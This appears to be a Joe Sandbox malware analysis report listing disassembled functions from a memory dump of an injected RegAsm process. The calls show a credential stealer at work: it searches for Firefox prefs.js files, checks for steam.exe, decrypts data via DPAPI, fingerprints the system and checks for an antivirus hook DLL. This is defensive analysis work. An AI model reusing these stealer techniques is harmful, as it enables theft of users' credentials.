Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1116797323-1173974218
Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

